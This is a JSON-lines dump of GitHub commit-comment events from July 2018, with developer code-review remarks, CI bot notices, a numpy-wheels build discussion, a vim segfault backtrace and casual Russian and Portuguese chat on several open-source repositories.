{"id":"7999238646","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29790129,"position":null,"line":null,"path":null,"commit_id":"0c0e365a4c2afc63f38370bbdc699245fbda969b","created_at":"2018-07-21T21:42:50Z","updated_at":"2018-07-21T21:42:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-343](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-343).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-343-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-21T21:42:50Z"}
{"id":"7999239230","type":"CommitCommentEvent","actor":{"login":"b2gills"},"repo":{"name":"perl6/roast"},"payload":{"comment":{"id":29790131,"position":null,"line":null,"path":null,"commit_id":"8cb7ff5d1914238a5e85471092cbb7fe4c08ed43","created_at":"2018-07-21T21:43:23Z","updated_at":"2018-07-21T21:43:23Z","author_association":"CONTRIBUTOR","body":"This wasn't going to work anyway, you needed to remove ` '==',`"}},"created_at":"2018-07-21T21:43:23Z"}
{"id":"7999240422","type":"CommitCommentEvent","actor":{"login":"pkharchenko"},"repo":{"name":"hms-dbmi/pagoda2"},"payload":{"comment":{"id":29790132,"position":null,"line":null,"path":null,"commit_id":"af31833485ecdf671ffd343e4cb1d630fa6612f1","created_at":"2018-07-21T21:44:34Z","updated_at":"2018-07-21T21:44:34Z","author_association":"CONTRIBUTOR","body":"other code uses sn(names(x)) for the same purpose as namedNames(x)"}},"created_at":"2018-07-21T21:44:34Z"}
{"id":"7999240490","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29790133,"position":16,"line":209,"path":"src/hdskins/java/com/voxelmodpack/hdskins/HDSkinManager.java","commit_id":"f1a02fcf90177533261f9b77ebee30a1081c07c1","created_at":"2018-07-21T21:44:38Z","updated_at":"2018-07-21T21:44:38Z","author_association":"MEMBER","body":"use a stream instead."}},"created_at":"2018-07-21T21:44:38Z"}
{"id":"7999244946","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29790148,"position":16,"line":209,"path":"src/hdskins/java/com/voxelmodpack/hdskins/HDSkinManager.java","commit_id":"f1a02fcf90177533261f9b77ebee30a1081c07c1","created_at":"2018-07-21T21:48:44Z","updated_at":"2018-07-21T21:48:44Z","author_association":"MEMBER","body":"```\r\n        skinServers.stream().forEach(server -> server\r\n                .loadProfileData(profile)\r\n                .map(MinecraftTexturesPayload::getTextures)\r\n                .ifPresent(a -> a.forEach(textures::putIfAbsent)));\r\n```\r\n\r\n...? \r\n\r\nAs far as I can tell streams only server to further obfuscate your intention."}},"created_at":"2018-07-21T21:48:44Z"}
{"id":"7999245685","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29790152,"position":null,"line":null,"path":null,"commit_id":"5037e7e01ed2ade14e659ce32ec929c1c9053f8f","created_at":"2018-07-21T21:49:27Z","updated_at":"2018-07-21T21:49:27Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-250](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-250).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-250-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-21T21:49:27Z"}
{"id":"7999245848","type":"CommitCommentEvent","actor":{"login":"Komzpa"},"repo":{"name":"postgis/postgis"},"payload":{"comment":{"id":29790153,"position":1,"line":1,"path":"regress/sfcgal/concave_hull.sql","commit_id":"5a6b8a512fd9c72402520a167571276e4504852f","created_at":"2018-07-21T21:49:36Z","updated_at":"2018-07-21T21:49:36Z","author_association":"MEMBER","body":"ouch, sfcgal backend got lost..."}},"created_at":"2018-07-21T21:49:36Z"}
{"id":"7999248838","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29790164,"position":null,"line":null,"path":null,"commit_id":"cb278d35d04c36bb6bd7f73827c986fd4519cbea","created_at":"2018-07-21T21:52:14Z","updated_at":"2018-07-21T21:52:14Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#2924 "}},"created_at":"2018-07-21T21:52:14Z"}
{"id":"7999250393","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29790166,"position":null,"line":null,"path":null,"commit_id":"6a8f592986f49f3914f5f0bf960e1ca95d358cdb","created_at":"2018-07-21T21:53:39Z","updated_at":"2018-07-21T21:53:39Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#2924 "}},"created_at":"2018-07-21T21:53:39Z"}
{"id":"7999251078","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29790169,"position":6,"line":508,"path":"src/main/java/net/pms/configuration/FormatConfiguration.java","commit_id":"7e0480650836a4872ffdccc33468c3acd87b6a43","created_at":"2018-07-21T21:54:18Z","updated_at":"2018-07-21T21:54:18Z","author_association":"CONTRIBUTOR","body":"@Sami32 We have to find a way to check the MediaInfo version (I don't think that should be a problem), because this will only work with very recent versions."}},"created_at":"2018-07-21T21:54:18Z"}
{"id":"7999251417","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29790170,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T21:54:39Z","updated_at":"2018-07-21T21:54:39Z","author_association":"CONTRIBUTOR","body":"On the latest build in the pre-releases there are entries like\r\n```\r\n- numpy-1.16.0.dev0+20180721043824_b48dc92-cp27-none-win_amd64.whl\r\n- numpy-1.16.0.dev0+20180721045005_b48dc92-cp27-none-win_amd64.whl\r\n```\r\nAFAICT the two differ only in the build time."}},"created_at":"2018-07-21T21:54:39Z"}
{"id":"7999254147","type":"CommitCommentEvent","actor":{"login":"matthew-brett"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29790174,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T21:57:20Z","updated_at":"2018-07-21T21:57:20Z","author_association":"CONTRIBUTOR","body":"Ah - was there are double upload after my comment above where I said I deleted the Appveyor project?"}},"created_at":"2018-07-21T21:57:20Z"}
{"id":"7999259462","type":"CommitCommentEvent","actor":{"login":"konstin"},"repo":{"name":"aep/elfkit"},"payload":{"comment":{"id":29790188,"position":null,"line":null,"path":null,"commit_id":"42c2097c3e507cb9f144e8e3492dd0ba3f1019b5","created_at":"2018-07-21T22:01:37Z","updated_at":"2018-07-21T22:01:37Z","author_association":"CONTRIBUTOR","body":"@aep Could you please publish this on crates.io? I can't publish my downstream crate otherwise."}},"created_at":"2018-07-21T22:01:37Z"}
{"id":"7999259542","type":"CommitCommentEvent","actor":{"login":"ReyDonovan"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790189,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T22:01:42Z","updated_at":"2018-07-21T22:01:42Z","author_association":"NONE","body":"жду 14 августа))) "}},"created_at":"2018-07-21T22:01:42Z"}
{"id":"7999260153","type":"CommitCommentEvent","actor":{"login":"rysson"},"repo":{"name":"CherryKodi/cherry-dev"},"payload":{"comment":{"id":29790190,"position":47,"line":null,"path":"plugin.video.fanfilm/resources/lib/sources/pl/iitvx.py","commit_id":"c0aea93458a45b809ca028c35d7755460396fb22","created_at":"2018-07-21T22:02:15Z","updated_at":"2018-07-21T22:02:15Z","author_association":"COLLABORATOR","body":"Ta i z 8 następnych linijek. Czy ja się mylę, czy to jest próbą napisania:\n\n```python\nquery = 'S{:02d}E{:02d}'.format(int(season), int(episode))\n```"}},"created_at":"2018-07-21T22:02:15Z"}
{"id":"7999260211","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29790191,"position":null,"line":null,"path":null,"commit_id":"b98d824ec6cc3a12c298f8c05aa45cccb460b318","created_at":"2018-07-21T22:02:19Z","updated_at":"2018-07-21T22:02:19Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3195 "}},"created_at":"2018-07-21T22:02:19Z"}
{"id":"7999260349","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29790192,"position":null,"line":null,"path":null,"commit_id":"f8c5e5dc81509bba74adf89cecce4cd775a9e424","created_at":"2018-07-21T22:02:27Z","updated_at":"2018-07-21T22:02:27Z","author_association":"COLLABORATOR","body":"@rama64 @jonx18 como puede ser que esto funcione de esta manera? \"name\" es un atributo privado de la clase Category. Sin embargo yo lo estoy pudiendo recuperar de la vista simplemente haciendo category.name en vez de category.getName().\r\nAdicionalmente al escribir \"category.\" no me siguiere nada. Es decir, en proyectos previos, cuando yo recuperaba objetos (sin usar Spring) tenia el objeto y accedia a sus getter y setter solamente y clarmente al trabajar con el objeto me sugeria al poner el \".\".\r\n\r\nEn este caso me parece muy feo el uso de Spring. No me parece buen framework y no entiendo por qué lo consideran algo bueno (en particular acá donde estamos rompiendo la encapsulacón). \r\nTampoco considero una ventaja la forma mágica en que resuelve las cosas, pienso que si algo se rompe es mas complicado de arreglar."}},"created_at":"2018-07-21T22:02:27Z"}
{"id":"7999260546","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29790194,"position":null,"line":null,"path":null,"commit_id":"76e2b4b8f8edbfdc4d4781723c8d3c64a2f634e2","created_at":"2018-07-21T22:02:37Z","updated_at":"2018-07-21T22:02:37Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3195 "}},"created_at":"2018-07-21T22:02:37Z"}
{"id":"7999260685","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29790195,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T22:02:44Z","updated_at":"2018-07-21T22:02:44Z","author_association":"CONTRIBUTOR","body":"Well, I don't know which came first. If I knew which timezone the times (I assume they are times) refer two could take a stab at the. I suppose the easiest thing might be to run it again. I was wondering if it might be due to this bit in the `.appveyor.yml` file\r\n```\r\n      BUILD_COMMIT: master\r\n      DAILY_COMMIT: master\r\n```\r\nand some tangled logic. It also looks like the nightly jobs might be missing again."}},"created_at":"2018-07-21T22:02:44Z"}
{"id":"7999261391","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29790197,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T22:03:22Z","updated_at":"2018-07-21T22:03:22Z","author_association":"CONTRIBUTOR","body":"BTW, is there an easy way to run the nightly build?"}},"created_at":"2018-07-21T22:03:22Z"}
{"id":"7999261637","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29790198,"position":10,"line":null,"path":"src/NUnitFramework/framework/Schemas/TestResult.xsd","commit_id":"28092fa19b0c0787cf7b65e565059f7bc11e52ed","created_at":"2018-07-21T22:03:35Z","updated_at":"2018-07-21T22:03:35Z","author_association":"MEMBER","body":"I agree."}},"created_at":"2018-07-21T22:03:35Z"}
{"id":"7999266670","type":"CommitCommentEvent","actor":{"login":"magro"},"repo":{"name":"lightbend/paradox"},"payload":{"comment":{"id":29790206,"position":14,"line":56,"path":"plugin/src/main/scala/com/lightbend/paradox/sbt/ParadoxPlugin.scala","commit_id":"1222fe9cd71f8b7a6d3e62f8a64718b8c0abde26","created_at":"2018-07-21T22:08:25Z","updated_at":"2018-07-21T22:08:25Z","author_association":"NONE","body":"@eed3si9n so how to proceed?"}},"created_at":"2018-07-21T22:08:25Z"}
{"id":"7999267403","type":"CommitCommentEvent","actor":{"login":"matthew-brett"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29790207,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T22:09:13Z","updated_at":"2018-07-21T22:09:13Z","author_association":"CONTRIBUTOR","body":"Aha - sorry - yes - the nightly builds were from my repository (now deleted).  I have cron permission from the Appveyor folks.  I guess the best thing would be to ask them for cron permission on the numpy account."}},"created_at":"2018-07-21T22:09:13Z"}
{"id":"7999268630","type":"CommitCommentEvent","actor":{"login":"stefanpenner"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":29790209,"position":30,"line":124,"path":"packages/@ember/application/globals-resolver.js","commit_id":"b8613c20289cc8a730e181c4c51ecfc4b6836052","created_at":"2018-07-21T22:10:24Z","updated_at":"2018-07-21T22:10:24Z","author_association":"MEMBER","body":"I think this is a breaking change, as it breaks the following tests: https://github.com/ember-cli/ember-resolver/blob/bea7a6efbc0ede7a00e0324b79935c55a661b001/tests/unit/resolvers/classic/basic-test.js?utf8=%E2%9C%93#L69-L73\r\n\r\nIt looks like its removed in newer versions: https://github.com/emberjs/ember.js/commit/ddd8d9b9d9f6d315185a34802618a666bb3aeaac but hasn't been backported.."}},"created_at":"2018-07-21T22:10:24Z"}
{"id":"7999269303","type":"CommitCommentEvent","actor":{"login":"MarcusMann"},"repo":{"name":"zumbipy/PythonExercicios"},"payload":{"comment":{"id":29790211,"position":4,"line":69,"path":"automodreadememd.py","commit_id":"03c53ca3078fada28ecba83c628eccaf156fb714","created_at":"2018-07-21T22:11:04Z","updated_at":"2018-07-21T22:11:04Z","author_association":"NONE","body":"Cuidado, nem toda ssh key é desprotegida, algumas usam senhas e talvez isso não funcione. Teria que testar, neste tipo de cenário."}},"created_at":"2018-07-21T22:11:04Z"}
{"id":"7999269701","type":"CommitCommentEvent","actor":{"login":"Ulduar"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790213,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T22:11:30Z","updated_at":"2018-07-21T22:11:30Z","author_association":"OWNER","body":"Вернулся интерес к ВоВ значит)"}},"created_at":"2018-07-21T22:11:30Z"}
{"id":"7999270541","type":"CommitCommentEvent","actor":{"login":"aep"},"repo":{"name":"aep/elfkit"},"payload":{"comment":{"id":29790215,"position":null,"line":null,"path":null,"commit_id":"42c2097c3e507cb9f144e8e3492dd0ba3f1019b5","created_at":"2018-07-21T22:12:17Z","updated_at":"2018-07-21T22:12:17Z","author_association":"OWNER","body":"sure. done 0.0.6"}},"created_at":"2018-07-21T22:12:17Z"}
{"id":"7999271224","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29790219,"position":6,"line":508,"path":"src/main/java/net/pms/configuration/FormatConfiguration.java","commit_id":"7e0480650836a4872ffdccc33468c3acd87b6a43","created_at":"2018-07-21T22:13:01Z","updated_at":"2018-07-21T22:13:01Z","author_association":"CONTRIBUTOR","body":"It should be easy.\r\nBut it ids not a problem without that so it could be added later if need.\r\nMediaInfo latest version is easily available for near all plateform on their website."}},"created_at":"2018-07-21T22:13:01Z"}
{"id":"7999271386","type":"CommitCommentEvent","actor":{"login":"ReyDonovan"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790220,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T22:13:11Z","updated_at":"2018-07-21T22:13:11Z","author_association":"NONE","body":"да есть такое даж подписку оформил)) чтоб отснифать новый контент)"}},"created_at":"2018-07-21T22:13:11Z"}
{"id":"7999271557","type":"CommitCommentEvent","actor":{"login":"MarcusMann"},"repo":{"name":"zumbipy/PythonExercicios"},"payload":{"comment":{"id":29790221,"position":25,"line":66,"path":"automodreadememd.py","commit_id":"e5b7914017ed3b1b465f6b6aff154d9f2de9fafc","created_at":"2018-07-21T22:13:20Z","updated_at":"2018-07-21T22:13:20Z","author_association":"NONE","body":"para dicionário use .get ao invés de [], para previnir os Exceptions"}},"created_at":"2018-07-21T22:13:20Z"}
{"id":"7999271990","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29790223,"position":null,"line":null,"path":null,"commit_id":"ad6480961080f80a455b2394f27b02935a2ded52","created_at":"2018-07-21T22:13:47Z","updated_at":"2018-07-21T22:13:47Z","author_association":"NONE","body":"@brammool \r\nThis commit causes a segfault with tests where I am using `:profile start` and `:profile! pattern/to/file` with an indent plugin.\r\nI am not using `:profdel`.\r\n\r\n```\r\n#0  0x000055593398f806 in func_dump_profile (fd=0x555935daeac0) at userfunc.c:2601\r\n#1  0x0000555933844c00 in profile_dump () at ex_cmds2.c:1839\r\n#2  0x00005559339cc5c5 in getout (exitval=1) at main.c:1474\r\n#3  <signal handler called>\r\n#4  0x00005559339907f1 in func_line_end (cookie=cookie@entry=0x555935dafb50)\r\n    at userfunc.c:3379\r\n#5  0x0000555933990978 in get_func_line (c=c@entry=58, cookie=cookie@entry=0x555935dafb50, \r\n    indent=<optimized out>) at userfunc.c:3287\r\n#6  0x00005559338550fd in do_cmdline (cmdline=cmdline@entry=0x0, \r\n    fgetline=fgetline@entry=0x555933990850 <get_func_line>, \r\n    cookie=cookie@entry=0x555935dafb50, flags=flags@entry=7) at ex_docmd.c:936\r\n#7  0x000055593398cb0a in call_user_func (selfdict=<optimized out>, lastline=2, \r\n    firstline=2, rettv=0x7ffee2fc81a0, argvars=<optimized out>, argcount=<optimized out>, \r\n    fp=0x555935d51f20) at userfunc.c:942\r\n#8  call_func (funcname=funcname@entry=0x555935d97310 \"GetPythonPEPIndent(v:lnum)\", \r\n    len=len@entry=18, rettv=rettv@entry=0x7ffee2fc81a0, argcount_in=argcount_in@entry=1, \r\n    argvars_in=argvars_in@entry=0x7ffee2fc7d50, argv_func=argv_func@entry=0x0, firstline=2, \r\n    lastline=2, doesrange=0x7ffee2fc7f30, evaluate=<optimized out>, partial=0x0, \r\n    selfdict_in=0x0) at userfunc.c:1436\r\n#9  0x000055593398d51c in get_func_tv (\r\n    name=name@entry=0x555935d97310 \"GetPythonPEPIndent(v:lnum)\", len=18, \r\n    rettv=rettv@entry=0x7ffee2fc81a0, arg=arg@entry=0x7ffee2fc8198, firstline=2, \r\n    lastline=2, doesrange=0x7ffee2fc7f30, evaluate=1, partial=0x0, selfdict=0x0)\r\n    at userfunc.c:451\r\n#10 0x000055593381ec30 in eval7 (arg=arg@entry=0x7ffee2fc8198, \r\n    rettv=rettv@entry=0x7ffee2fc81a0, evaluate=evaluate@entry=1, \r\n    want_string=want_string@entry=0) at eval.c:4158\r\n#11 0x000055593381f404 in eval6 (arg=arg@entry=0x7ffee2fc8198, \r\n    rettv=rettv@entry=0x7ffee2fc81a0, evaluate=evaluate@entry=1, \r\n    want_string=want_string@entry=0) at eval.c:3795\r\n#12 0x00005559338199fd in eval5 (evaluate=1, rettv=0x7ffee2fc81a0, arg=0x7ffee2fc8198)\r\n    at eval.c:3611\r\n#13 eval4 (arg=0x7ffee2fc8198, rettv=0x7ffee2fc81a0, evaluate=1) at eval.c:3495\r\n#14 0x0000555933819d34 in eval3 (arg=arg@entry=0x7ffee2fc8198, \r\n    rettv=rettv@entry=0x7ffee2fc81a0, evaluate=evaluate@entry=1) at eval.c:3415\r\n#15 0x0000555933819ea4 in eval2 (evaluate=1, rettv=0x7ffee2fc81a0, arg=0x7ffee2fc8198)\r\n    at eval.c:3347\r\n#16 eval1 (arg=0x7ffee2fc8198, rettv=0x7ffee2fc81a0, evaluate=1) at eval.c:3275\r\n#17 0x000055593381a46e in eval_to_number (\r\n    expr=expr@entry=0x555935b94ff0 \"GetPythonPEPIndent(v:lnum)\") at eval.c:890\r\n#18 0x00005559338a6ad0 in get_expr_indent () at misc1.c:9537\r\n#19 0x000055593380bb36 in fixthisline (get_the_indent=<optimized out>) at edit.c:8095\r\n#20 0x00005559338ad46b in open_line (dir=dir@entry=1, flags=0, \r\n    second_line_indent=second_line_indent@entry=0) at misc1.c:1790\r\n#21 0x0000555933809f3e in ins_eol (c=<optimized out>) at edit.c:10460\r\n#22 0x0000555933810db0 in edit (cmdchar=cmdchar@entry=105, startln=<optimized out>, count=1)\r\n    at edit.c:1442\r\n#23 0x00005559338c55c6 in invoke_edit (repl=<optimized out>, cmd=105, \r\n    startln=<optimized out>, cap=<optimized out>, cap=<optimized out>) at normal.c:9261\r\n#24 0x00005559338d1d09 in normal_cmd (oap=0x7ffee2fc8560, toplevel=1) at normal.c:1136\r\n#25 0x00005559339cd19a in main_loop (cmdwin=0, noexmode=0) at main.c:1353\r\n#26 0x00005559339ce309 in vim_main2 () at main.c:915\r\n#27 0x00005559337ec2bd in main (argc=<optimized out>, argv=<optimized out>) at main.c:443\r\n```\r\n\r\nThe tests are using vimrunner, and therefor interact with a server using `--servername` etc.\r\nI've noticed that the server vanished inside the Docker container, but could also reproduce it outside now.\r\nThe setup is not that easy, so hopefully I can provide enough information here:\r\n\r\n```\r\n#0  0x000055593398f806 in func_dump_profile (fd=0x555935daeac0) at userfunc.c:2601\r\n2601\t\t\t    prof_func_line(fd, fp->uf_tml_count[i],\r\n(gdb) p fd\r\n$1 = (FILE *) 0x555935daeac0\r\n(gdb) p fp->uf_tml_count\r\n$2 = (int *) 0x0\r\n(gdb) p i\r\n$3 = 0\r\n```\r\n\r\nThe whole code is this:\r\n```c\r\n\t\tfor (i = 0; i < fp->uf_lines.ga_len; ++i)\r\n\t\t{\r\n\t\t    if (FUNCLINE(fp, i) == NULL)\r\n\t\t\tcontinue;\r\n\t\t    prof_func_line(fd, fp->uf_tml_count[i],\r\n\t\t\t     &fp->uf_tml_total[i], &fp->uf_tml_self[i], TRUE);\r\n\t\t    fprintf(fd, \"%s\\n\", FUNCLINE(fp, i));\r\n\t\t}\r\n```\r\n\r\nWhere this gets used to skip it, but it is not true in this case:\r\n`#define FUNCLINE(fp, j)\t((char_u **)(fp->uf_lines.ga_data))[j]`"}},"created_at":"2018-07-21T22:13:47Z"}
{"id":"7999272010","type":"CommitCommentEvent","actor":{"login":"MarcusMann"},"repo":{"name":"zumbipy/PythonExercicios"},"payload":{"comment":{"id":29790224,"position":25,"line":66,"path":"automodreadememd.py","commit_id":"e5b7914017ed3b1b465f6b6aff154d9f2de9fafc","created_at":"2018-07-21T22:13:49Z","updated_at":"2018-07-21T22:13:49Z","author_association":"NONE","body":"`dic[chave].update(dict_juntar.get(chave))`"}},"created_at":"2018-07-21T22:13:49Z"}
{"id":"7999272417","type":"CommitCommentEvent","actor":{"login":"Ulduar"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790225,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T22:14:12Z","updated_at":"2018-07-21T22:14:12Z","author_association":"OWNER","body":"Я сильно сомневаюсь, что Тринити перейдут на БФА"}},"created_at":"2018-07-21T22:14:12Z"}
{"id":"7999272522","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/roast"},"payload":{"comment":{"id":29790226,"position":null,"line":null,"path":null,"commit_id":"8cb7ff5d1914238a5e85471092cbb7fe4c08ed43","created_at":"2018-07-21T22:14:18Z","updated_at":"2018-07-21T22:14:18Z","author_association":"MEMBER","body":"Yeah, I forgot to run the test file before committing."}},"created_at":"2018-07-21T22:14:18Z"}
{"id":"7999272636","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29790227,"position":null,"line":null,"path":null,"commit_id":"ad6480961080f80a455b2394f27b02935a2ded52","created_at":"2018-07-21T22:14:24Z","updated_at":"2018-07-21T22:14:24Z","author_association":"NONE","body":"/cc @pelle"}},"created_at":"2018-07-21T22:14:24Z"}
{"id":"7999273771","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29790231,"position":null,"line":null,"path":null,"commit_id":"096963154b232d41005b77a80a7ee06fb8eea721","created_at":"2018-07-21T22:15:29Z","updated_at":"2018-07-21T22:15:29Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-23](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-23).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-23-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T22:15:29Z"}
{"id":"7999273868","type":"CommitCommentEvent","actor":{"login":"ReyDonovan"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790232,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T22:15:34Z","updated_at":"2018-07-21T22:15:34Z","author_association":"NONE","body":"я щас поиграл и аддон впечетляет)) особено когда по мобам бьешь по 300 от силы)\r\n"}},"created_at":"2018-07-21T22:15:34Z"}
{"id":"7999274613","type":"CommitCommentEvent","actor":{"login":"eed3si9n"},"repo":{"name":"lightbend/paradox"},"payload":{"comment":{"id":29790234,"position":14,"line":56,"path":"plugin/src/main/scala/com/lightbend/paradox/sbt/ParadoxPlugin.scala","commit_id":"1222fe9cd71f8b7a6d3e62f8a64718b8c0abde26","created_at":"2018-07-21T22:16:21Z","updated_at":"2018-07-21T22:16:21Z","author_association":"MEMBER","body":"It goes back to what I was saying in https://github.com/lightbend/paradox/issues/225#issuecomment-406334434.\r\n\r\n> Since we are using sbt-web's mechanism to extract those assets, and it seems to be hardcoded for Compile configuration here https://github.com/sbt/sbt-web/blob/1c147d15c5bb39004b03f033e8a8de87c36a4b3c/src/main/scala/com/typesafe/sbt/web/SbtWeb.scala#L200, you'd need to recreate the mechanism to get the assets out of the custom configuration.\r\n\r\nSince `update` task only looks at unscoped `libaryDependencies`, unscoping it makes sense. But now that the theme would be loaded into the `ParadoxTheme` configuration, sbt-web won't see it either. Next step would be to retrieve the artifacts back. I can help you with that since I've lead you into this rabbit hole."}},"created_at":"2018-07-21T22:16:21Z"}
{"id":"7999274851","type":"CommitCommentEvent","actor":{"login":"Ulduar"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790235,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T22:16:36Z","updated_at":"2018-07-21T22:16:36Z","author_association":"OWNER","body":"Это ещё цветочки. Думаю, первый рейд тебя впечатлит куда сильнее, если тебя конечно тематика титанов интересует."}},"created_at":"2018-07-21T22:16:36Z"}
{"id":"7999274889","type":"CommitCommentEvent","actor":{"login":"konstin"},"repo":{"name":"aep/elfkit"},"payload":{"comment":{"id":29790236,"position":null,"line":null,"path":null,"commit_id":"42c2097c3e507cb9f144e8e3492dd0ba3f1019b5","created_at":"2018-07-21T22:16:38Z","updated_at":"2018-07-21T22:16:38Z","author_association":"CONTRIBUTOR","body":"Great, thank you!"}},"created_at":"2018-07-21T22:16:38Z"}
{"id":"7999275929","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29790243,"position":6,"line":508,"path":"src/main/java/net/pms/configuration/FormatConfiguration.java","commit_id":"7e0480650836a4872ffdccc33468c3acd87b6a43","created_at":"2018-07-21T22:17:40Z","updated_at":"2018-07-21T22:17:40Z","author_association":"CONTRIBUTOR","body":"If you want make a commit or a PR:\r\n`mediainfo --version`"}},"created_at":"2018-07-21T22:17:40Z"}
{"id":"7999277824","type":"CommitCommentEvent","actor":{"login":"manodeep"},"repo":{"name":"jacobseiler/genesis"},"payload":{"comment":{"id":29790252,"position":143,"line":401,"path":"genesis/utils/converter.py","commit_id":"11f518548b4e4406afeff0a55c266c226c3b1b41","created_at":"2018-07-21T22:19:37Z","updated_at":"2018-07-21T22:19:37Z","author_association":"COLLABORATOR","body":"I am guessing `sage` will be fine because these forests will get processed under the `HaloAux[halonr].DoneFlag == 0` clause. I say leave them in, until and unless `sage` crashes while trying to process these dangling forests"}},"created_at":"2018-07-21T22:19:37Z"}
{"id":"7999278144","type":"CommitCommentEvent","actor":{"login":"ReyDonovan"},"repo":{"name":"Ulduar/AshamaneCore"},"payload":{"comment":{"id":29790253,"position":null,"line":null,"path":null,"commit_id":"f473141390f3e83d2dfda823607cc26f2b611caf","created_at":"2018-07-21T22:19:57Z","updated_at":"2018-07-21T22:19:57Z","author_association":"NONE","body":"на gitlabe начинаю движение помаленьку))) у тебя доступы к репо снифоф есть)) ток ни ни не кому)\r\n"}},"created_at":"2018-07-21T22:19:57Z"}
